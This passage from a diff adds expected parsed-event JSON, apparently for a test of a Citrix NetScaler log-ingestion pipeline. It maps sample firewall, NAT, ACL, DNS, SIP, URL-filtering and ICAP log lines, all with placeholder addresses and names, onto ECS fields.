+ "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 102400, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T12:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 51200, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset" + }, + "facility": "local0", + "host": "ns1", + "name": 
"NAT_CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "closure_reason": "Client Reset", + "delink_time": "2023-04-01T11:05:00.000Z", + "delink_timezone": "GMT", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "original_destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 153600, + "total_bytes_send": 102400, + "translated_destination": { + "ip": "1.128.0.0", + "port": 8080 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 153600, + "ip": "1.128.0.0", + "port": 8080 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "reason": "Client Reset", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + 
"1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout" + }, + "facility": "local0", + "host": "ns1", + "name": "NAT_OTHERCONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "closure_reason": "Timeout", + "delink_time": "2023-04-01T11:05:00.000Z", + "delink_timezone": "GMT", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "original_destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 153600, + "total_bytes_send": 102400, + "translated_destination": { + "ip": "1.128.0.0", + "port": 8080 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + 
"country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 153600, + "ip": "1.128.0.0", + "port": 8080 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "reason": "Timeout", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "device_event_class_id": "ACL", + "extended": { + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data" + }, + "facility": "local0", + "host": "ns1", + "name": "ACL_PKT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + 
"action": "ALLOW", + "code": "0", + "destination": { + "ip": "1.128.0.0" + }, + "hit": { + "count": 5, + "rule": "Allow ICMP" + }, + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "protocol": "ICMP", + "source": { + "ip": "192.168.1.100" + }, + "timestamp": "2021-03-30T16:57:36.789Z", + "type": "8" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "code": "0", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "icmp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "device_event_class_id": "ACL", + "extended": { + 
"message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data" + }, + "facility": "local0", + "host": "ns1", + "name": "ACL6_PKT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "code": "1", + "destination": { + "ip": "1.128.0.0" + }, + "hit": { + "count": 3, + "rule": "Block ICMP" + }, + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "protocol": "ICMP", + "source": { + "ip": "192.168.1.100" + }, + "timestamp": "2021-03-30T16:57:47.890Z", + "type": "3" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "code": "1", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "icmp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + 
"detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_QUERY", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "category": "15", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain": "example.com", + "message": "Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "reason": "UserAuthenticated ", + "source": { + "ip": "192.168.1.10", + "port": 12345 + }, + "user": "johndoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "reason": "UserAuthenticated ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.10", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "johndoe" + ] + }, + 
"source": { + "ip": "192.168.1.10", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com", + "name": "johndoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_RESPONSE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "category": "10", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.org", + "message": "Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "reason": "CategoryBlocked ", + "source": { + "ip": "192.168.1.11", + "port": 23456 + }, + "user": "janedoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "reason": 
"CategoryBlocked ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.11", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "janedoe" + ] + }, + "source": { + "ip": "192.168.1.11", + "port": 23456 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.org", + "name": "janedoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "category": "20", + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "domain": "example.net", + "message": "Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "reason": "AdminApproved ", + "source": { + "ip": "192.168.1.12", + "port": 34567 + }, + "user": "bobsmith" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + 
"id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "reason": "AdminApproved ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.12", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "bobsmith" + ] + }, + "source": { + "ip": "192.168.1.12", + "port": 34567 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.net", + "name": "bobsmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "device_event_class_id": "ALG", + "extended": { + "message": "Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -" + }, + "facility": "local0", + "host": "ns1", + "name": "ALG_SIP_INFO_PACKET_EVENT", + "priority": "info" + }, + 
"citrix_adc": { + "log": { + "call_id": "uvw456", + "callee": { + "domain_name": "example.org", + "user_name": "user6" + }, + "caller": { + "domain_name": "example.org", + "user_name": "user5" + }, + "content_type": "text/plain", + "destination": { + "ip": "1.128.0.0", + "port": 25061 + }, + "group": "Requests", + "infomsg": "SIP request received", + "message": "Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "method": "BYE", + "natted": { + "ip": "1.128.0.0", + "port": 20000 + }, + "register": "NO", + "sequence_number": 303, + "source": { + "ip": "1.128.0.0", + "port": 25060 + }, + "transport": "UDP" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "nat": { + "ip": "1.128.0.0", + "port": 20000 + }, + "port": 25061, + "user": { + "domain": "example.org", + "name": "user6" + } + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - 
Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Requests" + }, + "http": { + "request": { + "method": "BYE" + } + }, + "message": "SIP request received", + "network": { + "transport": "udp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "user5", + "user6" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 25060, + "user": { + "domain": "example.org", + "name": "user5" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "device_event_class_id": "ALG", + "extended": { + "message": "Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -" + }, + "facility": "local0", + "host": "ns1", + "name": "ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "group": "RTSPALG", + "infomsg": "Log info RTSP ALG call deletion", + "message": "Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "session_id": "session123" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ 
+ "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "RTSPALG" + }, + "message": "Log info RTSP ALG call deletion", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW", + "device_event_class_id": "URLFILT", + "extended": { + "message": "Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW" + }, + "facility": "local0", + "host": "ns1", + "name": "URLFILT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "category": "Technology", + "category_group": "Internet", + "destination": { + "ip": "1.128.0.0" + }, + "policy_action": "ALLOW", + "reputation": 3, + "source": { + "ip": "192.168.1.100" + }, + "url": "www.example.com/page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 
14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "extension": "com/page", + "original": "www.example.com/page", + "path": "www.example.com/page" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "device_event_class_id": "CI", + "extended": { + "message": "Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY" + }, + "facility": "local0", + "host": "ns1", + "name": "ICAP_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "MODIFY", + "content_type": "application/json", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain": "example.org", + "icap_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "message": "Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "mode": "PREVIEW", + "response": { + "code": 200 + }, + "service": "WebFilter", + 
"source": { + "ip": "192.168.1.101", + "port": 1234 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "modify", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.101", + "1.128.0.0", + "192.168.1.102", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "ip": "192.168.1.101", + "port": 1234 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" 